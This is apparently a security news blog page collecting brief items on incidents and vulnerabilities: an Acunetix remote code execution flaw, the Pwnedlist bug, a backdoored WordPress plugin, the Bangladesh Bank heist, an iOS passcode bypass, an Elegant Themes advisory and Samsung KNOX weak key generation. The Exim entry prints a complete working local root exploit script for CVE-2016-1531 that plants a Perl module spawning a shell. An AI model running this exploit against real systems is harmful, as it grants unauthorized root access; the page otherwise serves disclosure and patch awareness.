acunetix
Hacks and Incidents

Acunetix WVS 10 0Day SYSTEM remote command execution

Acunetix WVS 10 0Day SYSTEM remote command execution: Acunetix WVS 10 0Day SYSTEM remote command execution by Italian researcher Daniele Linguaglossa.

This poc show the exploitation of 2 flaw affecting Acunetix WVS 10, by exploiting them is possibile to execute command on victim machine just by scanning it, and then using a second flaw is possibile to elevate privilege till SYSTEM.

Not the first time Acunetix has serious flaws: in 2014 a simple Stack Overflow was found by Vaibhav Deshmukh:

http://cybersecwarriors.blogspot.it/2014/09/finally-hacked-hacker-acunetix-suffers.html

acunetix-exploit2 acunetix-exploit

Standard
website-security
Hacks and Incidents

How the Pwnedlist Got Pwned

How the Pwnedlist Got Pwned: Indeed, after about a minute of instruction, I was able to replicate Hodges’ findings, successfully adding Apple.com to my watchlist. I also found I could add basically any resource I wanted. Although I verified that I could add top-level domains like “.com” and “.net,” I did not run these queries because I suspected that doing so would crash the database, and in any case might call unwanted attention to my account. (I also resisted the strong temptation to simply shut up about this bug and use it as my own private breach alerting service for the Fortune 500 firms).

Standard
wordpress-hacked
Hacks and Incidents

When a WordPress Plugin Goes Bad

When a WordPress Plugin Goes Bad: Custom Content Type Manager (CCTM) is a relatively popular plugin with three years of development, 10,000+ active installs, and a satisfaction rating of 4.8. It helps create custom post types. Website owners find the classical “blog format” too restrictive, use the plugin to add custom elements to their posts. So far so good.

This week we cleaned one infected site and found a very suspicious auto-update.php file inside wp-content/plugins/custom-content-type-manager/.

Standard
175195728-ed
Hacks and Incidents

Hackers tried and failed to steal a billion dollars from bank

Hackers tried and failed to steal a billion dollars from bank: Hackers stole $80 million from a bank, but it could have been a lot worse if they had just Googled the name of a company, according to Reuters. Thieves got inside servers of the Bangladesh Bank, stealing the credentials used to make online transfers. They then bombarded the Federal Reserve Bank in New York with up to 13 money transfer requests to organizations in the Philippines and Sri Lanka. The Fed allowed four to go through totaling $81 million, but the next one was flagged by a routing bank in Germany because the hackers misspelled “foundation” as “fandation.”

Standard
APPLE-HACK
Security Techniques

How to bypass Apple Passcode in 9.1 and laterSecurity Affairs

How to bypass Apple Passcode in 9.1 and later: “An application update loop that results in a pass code bypass vulnerability has been discovered in the official Apple iOS (iPhone5&6|iPad2) v8.x, v9.0, v9.1 & v9.2. The security vulnerability allows local attackers to bypass pass code lock protection of the apple iphone via an application update loop issue. The issue affects the device security when processing to request a local update by an installed mobile ios web-application.” states the technical description published by the vulnerability-lab.com.

 

Standard
exim-blue-ld
Hacks and Incidents

Exim 4.84-3 Local Root / Privilege Escalation

Time to patch your Exim against local attackers as 4.84-3 and below are affected by a pretty simple vulnerability: the SUID exim binar, when invoked with the “perl_startup” flag, uses environment variables in an unsafe way. As result an attacker can execute arbitrary Perl code as root.

#!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" arguement -ps. 
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh 
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
# 
# -- Hacker Fantastic 
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;

system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps

Read more on https://packetstormsecurity.com/files/136124/Exim-4.84-3-Local-Root-Privilege-Escalation.html and http://exim.org/static/doc/CVE-2016-1531.txt.

Standard
wordpress-hacked
Hacks and Incidents

Elegant Themes Divi builder and Plugin Options vulnerabilities

Some WordPress themes from ElegantThemes (http://www.elegantthemes.com) are vulnerable to user privilege escalation.

Below the complete advisory information:

Today our divi builder and plugin options frameworks were updated to fix a security vulnerability. The vulnerability affects several of our themes and plugins, including our Divi (http://www.elegantthemes.com/gallery/divi/) , Extra (http://www.elegantthemes.com/gallery/extra/) , and Divi 2.3 (legacy) themes, as well as our Divi Builder (http://www.elegantthemes.com/plugins/divi-builder/) , Bloom (http://www.elegantthemes.com/plugins/bloom/) and Monarch (http://www.elegantthemes.com/plugins/monarch/) plugins.

Updating these themes and plugins to their latest versions will patch this vulnerability, keeping your websites safe. These are critical updates.

There have been no reports of exploit attempts against this vulnerability. The vulnerability was privately disclosed to our team and we worked closely with the researcher, our team and a third-party security vendor to identify and patch the vulnerability quickly.

The Security Vulnerability

An information disclosure vulnerability was found in the Divi Builder (included in our Divi and Extra themes, as well as our Divi Builder plugin) which resulted in the potential for user privilege escalation. If properly exploited, it could allow registered users, regardless of role, on your WordPress installation to perform a subset of actions within the Divi Builder, including the ability to manipulate posts.

A similar flaw was found in Bloom and Monarch, creating the potential for registered WordPress users to manipulate plugin settings.

If you are using any of the products listed above and you have untrusted authors, plugins that allow user registration or you have enabled open user registration, you are at risk from this vulnerability.

How To Fix It

Updating your themes and plugins will fix this problem.

You can update your theme (http://www.elegantthemes.com/gallery/divi/documentation/update/) or update your plugin (http://www.elegantthemes.com/plugins/divi-builder/documentation/update/) using our elegant updater plugin, or you can download the latest versions from the members area (https://www.elegantthemes.com/members-area/) and update them manually (https://www.elegantthemes.com/members-area/documentation.html#updater) . We have also created an upgrade path for our legacy Divi 2.3 theme. If you have been using this legacy version and do not wish to upgrade fully, you will notice an update notification for version 2.3.4 is now available. You can also download version 2.3.4 from the members area. This will patch the vulnerability without adding new features.

The following product versions are patched and secured:

  • Divi 2.6.4
  • Divi (legacy) 2.3.4
  • Divi Builder 1.2.4
  • Extra 1.2.4
  • Bloom 1.1.1
  • Monarch 1.2.7

Has Your Account Expired?

We are making these updates available for free to all expired accounts. We want as many people as possible to have easy access to this patch. Even if your account has expired, you can still use our updater plugin to update to this particular theme/plugin version. Expired accounts will not be restricted from updating. You can also contact us to have the latest versions sent to you if you have forgotten your username and API key. Simply reply to this email.

What If You Can’t Update Right Now?

It’s not recommended that you continue to use affected versions. If you are unable to update your themes/plugins right away, we’ve compiled a list of actions you can take to lessen the potential exposure:

* Install The Security Patcher: We created a plugin that will patch the issue without upgrading your versions. This is a free download (https://www.elegantthemes.com/members-area/security/) for all customers. This is ideal for anyone that is unable to upgrade for whatever reason. Installing this plugin along with out-dated versions of our themes & plugins will patch known vulnerabilities in our products to the best of its ability.

* Disable User Registration: It’s suggested that you delete any untrusted registered users from your WordPress installation, disable plugins that allow for user registration and make sure that you have not enabled the anyone can register setting (https://codex.wordpress.org/Settings_General_Screen) in your WordPress Dashboard. This vulnerability only applies to WordPress websites that have untrusted registered users, so disallowing user registration will effectively remove the potential for user privilege escalation.

* Web Application Firewalls: We have coordinated with Sucuri’s CloudProxy (https://sucuri.net/website-firewall/) team and they have virtually patched the vulnerability within their network. Utilizing the CloudProxy WAF will help specifically target and protect some aspects of this vulnerability.

The above steps are not necessary if you have upgraded your themes and plugins. Upgrading should be considered the only true fix, but we understand that in some circumstances this may prove difficult. In those cases, the recommendations above are most effective.

Security is Very Important to Us

I can personally assure you that security is paramount here at Elegant Themes. We take a number of precautions to help mitigate issues like this. Some of those precautions include internal peer reviews and occasional third-party independent reviews, including static / dynamic code analysis and human line-by-line code audits. Regardless, in this instance, something slipped through the process and we’re working hard to identify how, but more importantly how to avoid it in the future.

While our team worked to fix these vulnerabilities, we also contacted Sucuri, a leading WordPress security research team, to perform a new and complete security audit of Divi and the included divi builder framework. We followed this up with a full internal re-review of all affected products.

I can not begin to express my apologies for the inconvenience this may present to our customers. We are extremely disappointed that this occurred, and will continue to work towards providing you the exemplary products you have come to expect. As a member of Elegant Themes, you can be sure that we will always be here to help keep you and your client’s websites safe. As a final reminder, please remember to always keep your themes and plugins updated. In this case, a timely upgrade is all that’s needed to secure your websites.

If you have any questions or concerns, please know that our virtual doors are always open. If there is anything we can do to help, just let us know.

Best Wishes,
Nick Roach

 

Standard
Knox_Security_Galaxy_S4_I9505
Hacks and Incidents

Samsung KNOX 1.0 Weak eCryptFS Key Generation

Samsung KNOX 1.0 Weak eCryptFS Key Generation ≈ Packet Storm: The vulnerability allows disclosure of Data-at-Rest of Samsung KNOX 1.0 containers.

KNOX container data is encrypted using eCryptFS containers. The same form of encryption is applied to both container application data and sdcard content.

To provide eCryptFS the required a 32-byte AES key, KNOX produces a combination of the user’s password (minimum 7 chars) and 32 random bytes (denoted as the TIMA key).

The TIMA key is generated during the first container creation and stored aside for later use in creating the eCryptFS key.

The vulnerability itself is in the generation of the eCryptFS-key from the password and the TIMA key.

Standard